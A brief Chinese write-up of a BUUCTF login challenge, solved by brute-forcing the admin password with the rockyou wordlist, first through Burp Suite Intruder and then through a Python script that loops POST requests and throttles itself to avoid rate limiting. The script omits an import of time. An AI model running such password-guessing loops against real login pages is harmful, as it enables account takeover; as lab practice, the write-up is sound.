随手打开的buuctf的一道basic题目
打开靶机,是一个登录页面
首先想到的是试试有无sql注入,看看能不能万能密码登录
应该是不可以了,再看看还有什么信息
F12发现前端代码中有提示
查了下发现这是kali中的一个字典文件,路径在/usr/share/rockyou.txt.gz
导出用burpsuite的Intruder模块进行爆破
这里我已经试出来了用户名为admin
抓个包指定密码开run,注意我这里是buuctf的靶机,爆破频率太高了会报429,我调了一下这个resource pool发现是有用的
比较尴尬的是这里burp加载字典的时候崩掉了,所以写个python脚本去爆破也行
import requests
url = "http://c2d38116-2dda-4e61-8ae1-5b69bd6c8716.node4.buuoj.cn:81/login.php"
with open('D:\\Desk\\rockyou.txt') as f:
line = f.readline()
i = 0
while line:
line = line.strip('\n')
d = {'email': 'admin', 'password': line, 'remember_me': 0}
r = requests.post(url, data=d)
print(line+r.text)
if len(r.text) != 51:
print(r.text)
break
line = f.readline()
i += 1
time.sleep(0.1) #控制频率,防止buu报403
跑出flag,但是试了试发现这个密码也不是正确的密码,很怪,总之是拿到flag了。